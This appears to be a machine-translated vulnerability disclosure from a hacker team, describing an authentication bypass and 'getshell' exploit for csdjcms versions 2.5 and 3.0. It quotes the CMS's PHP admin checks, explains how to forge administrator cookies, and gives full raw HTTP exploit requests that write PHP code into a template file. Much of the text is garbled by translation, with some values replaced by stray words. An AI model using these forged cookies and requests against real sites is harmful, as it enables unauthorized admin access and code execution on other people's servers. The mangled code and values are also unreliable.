/*************************************** * *************** // * Csdjcms <V 3.0 getshell Vulnerability/* ============ ===============/*:: Kn1f3/* E-Mail: 681796@qq.com/* ======================================== /************ **************************************** * ** // * 90sec team /******************************* * *********************/csdjcms is a singing website that YY hackers and YY pig stream like to use.. I haven't come to toast for a long time .. Resurrected. This time I will launch a vulnerability. I still have a few friends on toast. Remember me, csdjcms V 2.5 code.
// The old rule first looks at include_once ("include/install. php "); if (S_IsInstall = 0) {header (" Location: install/install. php ");} include_once (" include/label. php "); if (S_Webmode = 1 or! File_exists ("index.html") {// cache area $ cache_id = 'index _ '; if (! ($ Cache_opt-> start ($ cache_id) {echo GetTemp ("index.html", 0); $ cache_opt-> end () ;}} else {header ("Location: index.html ");} // check whether function SafeRequest ($ key, $ mode, $ isfilter ='') {set_magic_quotes_runtime (0); $ magic = get_magic_quotes_gpc (); switch ($ mode) {case 'post': $ value = isset ($ _ post [$ key])? $ Magic? Trim ($ _ POST [$ key]): addslashes (trim ($ _ POST [$ key]): ''; break; case 'get ': $ value = isset ($ _ GET [$ key])? $ Magic? Trim ($ _ GET [$ key]): addslashes (trim ($ _ GET [$ key]): ''; break; default: $ value = isset ($ _ POST [$ key])? $ Magic? Trim ($ _ POST [$ key]): addslashes (trim ($ _ POST [$ key]): ''; if ($ value = "") {$ value = isset ($ _ GET [$ key])? $ Magic? Trim ($ _ GET [$ key]): addslashes (trim ($ _ GET [$ key]): '';} break;} if ($ isfilter! = '') {$ Value = lib_replace_end_tag ($ value);} return $ value ;} // The variable is submitted for addslashes Security filtering // after studying the source code for half a day, it is found that there are serious security problems in the background include ".. /include/conn. php "; include ".. /include/function. php "; include" admin_version.php "; include" admin_loginstate.php "; // the problem lies in this file. // enter if (empty ($ _ COOKIE ['s _ adminid']) {// first check whether the coke echo s_adminid exists. "<script> window. location = 'admin _ login. php' </script> ";} elseif ($ _ COOKIE ['s _ Login ']! = Md5 ($ _ COOKIE ['s _ AdminID ']. $ _ COOKIE ['s _ AdminUserName ']. $ _ COOKIE ['s _ AdminPassWord ']. $ _ COOKIE ['s _ Permission ']) {// The key here is the problem. If the value of s_login is equal to the md5 encryption of the four cookies, echo "<script> window. parent. location = 'admin _ login. php' </script> ";}// the background Permission judgment function SystemPer ($ Column) {if (empty ($ _ COOKIE ['s _ Permission ']) {die ("<script> jAlert ('Sorry, you are not authorized to perform this operation! ', 'Operation error', function (R) {window. location = 'javascript: history. go (-1) ';}) </script> ");} else {$ SystemPermission = explode (", ", $ _ COOKIE ['s _ Permission']); // permission judgment, separated by "," into an array $ StateOK = 0; $ ArrSystemPermission = count ($ SystemPermission); for ($ k = 0; $ k <$ ArrSystemPermission; $ k ++) {if ($ SystemPermission [$ k] ==$ Column) {// judge $ StateOK = 1 ;}} if ($ StateOK = 0) {die ("<script> jAlert ('Sorry, you are not authorized to perform this operation! ', 'Operation error', function (R) {window. location = 'javascript: history. go (-1) ';}) </script> ") ;}}// construct an obscene cookie // S_Permission //, 9, 10, 11,12, 13,14, 15 // S_Login // md5 (AdminID + AdminUserName + AdminPassWord + S_Permission) // S_AdminUserName // 1 // S_AdminPassWord // 1 // S_AdminID // 1 the background is successfully bypassed. // Check version 3.0.
<? Php # Name: PHP version of Cheng's music CMS management system v3.0 # Author: Cheng's <[email] web@chshcms.com [/email]> [QQ: 848769359] # Homepage: [url] http://www.chshcms.cn/ [/Url] $ CS_Path = $ _ SERVER ['php _ SELF ']; $ CS_Pathall = explode ("/", $ CS_Path); $ CS_Admin = $ CS_Pathall [1]. "/"; if (empty ($ _ COOKIE ['cs _ adminid']) {echo "<script> window. parent. location = '". CS_WebPath. $ CS_Admin. "login. php'; </script> ";} elseif ($ _ COOKIE ['cs _ login']! = Md5 ($ _ COOKIE ['cs _ adminid']. $ _ COOKIE ['cs _ adminusername']. $ _ COOKIE ['cs _ adminpassword']. $ _ COOKIE ['cs _ quanx']) {echo "<script> window. parent. location = '". CS_WebPath. $ CS_Admin. "login. php' </script> ";}// backend permission judgment function SystemPer ($ Column) {if (empty ($ _ COOKIE ['cs _ quanx']) {die ("<script> alert ('Sorry, you are not authorized to perform this operation! '); Window. location = 'javascript: history. go (-1); '</script> "); exit ();} else {$ SystemPermission = explode (",", $ _ COOKIE ['cs _ quanx']); $ StateOK = 0; $ ArrSystemPermission = count ($ SystemPermission); for ($ k = 0; $ k <$ ArrSystemPermission; $ k ++) {if ($ SystemPermission [$ k] ==$ Column) {$ StateOK = 1 ;}} if ($ StateOK = 0) {die ("<script> alert ('Sorry, you are not authorized to perform this operation! '); Window. location = 'javascript: history. go (-1); '</script> "); exit () ;}} use exp V2.5Host: www. xxx. comUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv: 19.0) Gecko/20100101 Firefox/19.0 Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8Accept-Language: zh-cn, zh; q = 0.8, en-us; q = 0.5, en; q = 0.3Accept-Encoding: gzip, deflateReferer: http://www.xxx.com/admin/admin_t ... Optional file1_artindex.html Cookie: S_Permission =, 15; S_Login = enabled; S_AdminUserName = 1; S_AdminPassWord = 1; S_AdminID = 1; cnzzdata=0884 = cnzz_eid % hour % 253A % 252F % hour % 26 ntime % 3D1364935608% 26cnzz_a % 3D19% 26 retime % hour % 26sin % 3 Dnone % 26 ltime % hour % 26 rtime % 3D0; bd1__firstime = 1365107576347; PHPSESSID = u6kd9d6f18fhfr9bi4if6agcj6Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 169 FileName = cs-bottom.php & content = % 3C % 3 Fphp + phpinfo + % 3F % 3E & folder = .. % 2 Fskins % 2 Findex % 2 Fhtml % 2F & tempname = % C4 % AC % C8 % CF % C4 % A3 % B0 % E6 & Submit = % D0 % DE % B8 % c4 % B5 % B1 % C7 % B0 % C4 % A3 % B0 % E5 ---------------------------------------------- exp V3.0: host: www. xxx. comUser-Agent: Mozilla/5.0 (Windows NT 5.1; rv: 19.0) Gecko/20100101 Firefox/19.0 Accept: text/html, application/xhtml + xml, application/xml; q = 0.9, */*; q = 0.8Accept-Language: zh-cn, zh; q = 0.8, en-us; q = 0.5, en; q = 0.3Accept-Encoding: gzip, deflateReferer: http://www.xxx.com/admin/skins/s ...; Name = cs-bottom.phpCookie: CS_AdminID = 1; CS_AdminUserName = 1; CS_AdminPassWord = 1; CS_Quanx = 0_1, 1_1, 1_2, 1_3, 1_4, 1_5, 2_1, 2_2, 2_3, 2_4, 2_5, 2_6, 2_7, 3_1, 3_2, 3_3, 3_4, 4_1, 4_2, 4_3, 4_4, 4_5, 4_6, 4_7, 5_1, 5_2, 5_3, 5_4, 5_5, 6_1, 6_2, 6_3, 7_1, 7_2, 8_1, 8_2, 8_3, 8_4; CS_Login = listen; PHPSESSID = 48ogo025b66lkat9jtc8aecub1; CNZZDATA3755283 = cnzz_eid % hour % 253A % 252F % hour % 26 ntime % 3D1364956519% 26cnzz_a % 3D1% 26 retime % hour % 26sin % 3D % 26 ltime % hour % 26 rtime % 3D0; bd1__firstime = 1365129335963 Connection: keep-aliveContent-Type: application/x-www-form-urlencodedContent-Length: 57 name = cs-bottom.php & content = % 3C % 3 Fphp + phpinfo % 28% 29 + % 3F % 3E